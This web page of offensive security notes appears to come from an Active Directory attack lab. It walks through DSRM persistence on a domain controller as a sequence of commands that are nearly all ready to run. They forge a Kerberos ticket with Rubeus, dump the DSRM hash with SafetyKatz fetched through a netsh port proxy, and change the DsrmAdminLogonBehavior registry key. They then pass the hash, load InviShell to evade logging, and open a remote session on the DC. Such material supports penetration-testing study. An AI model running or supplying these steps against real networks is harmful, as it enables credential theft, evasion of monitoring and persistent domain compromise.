Skip to content

DSRM

πŸ”‘ DSRM (Directory Services Restore Mode)

Every Domain Controller has a local Administrator account whose password is the SafeModePassword, set when the server was promoted to DC. It is rarely changed, making it ideal for long-term persistence.

Requirements: - Domain Admin privileges. - Access to the DC.

Step 1 - Get a DA session

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args "asktgt /user:svcadmin /aes256:[HASH_AES256_SVCADMIN] /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt"

Step 2 - Copy Loader to DC and dump the DSRM hash

# Copy Loader.exe to the DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Access the DC
winrs -r:dcorp-dc cmd

# Create a port proxy to download SafetyKatz from your machine (avoids touching disk)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X

# Dump the SAM hive to get the DSRM hash
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"

⚠️ The first Administrator hash from lsadump::evasive-sam is the DSRM one. Compare with lsadump::lsa /patch to confirm.

Step 3 - Modify DC registry to allow network login

By default DSRM Administrator cannot login from the network. Change this by modifying the registry key DsrmAdminLogonBehavior on the DC: 

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f

/d 2 = allows network login always, not only in DSRM recovery mode.

Step 4 - Pass-the-Hash and access the DC

DSRM is a local account, so we use NTLM (not Kerberos) and connect via IP instead of hostname. 

# PTH with the DSRM NTLM hash - opens a new cmd.exe with injected credentials
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:[HASH_DSRM_NTLM] /run:cmd.exe" "exit"

# From the new process - add DC IP to TrustedHosts (required for NTLM over IP)
Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1

# Load InviShell to evade logging
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Connect to the DC using IP (forces NTLM) and implicit credentials (uses injected hash)
Enter-PSSession -ComputerName 172.16.2.1 -Authentication NegotiateWithImplicitCredential

⚠️ Why IP and not hostname? Kerberos uses hostnames, NTLM uses IPs. Since DSRM is a local account it doesn't exist in Kerberos, so we force NTLM by connecting via IP.

⚠️ Why NegotiateWithImplicitCredential? It tells PowerShell to use the credentials already injected in memory by the PTH, without prompting for a password.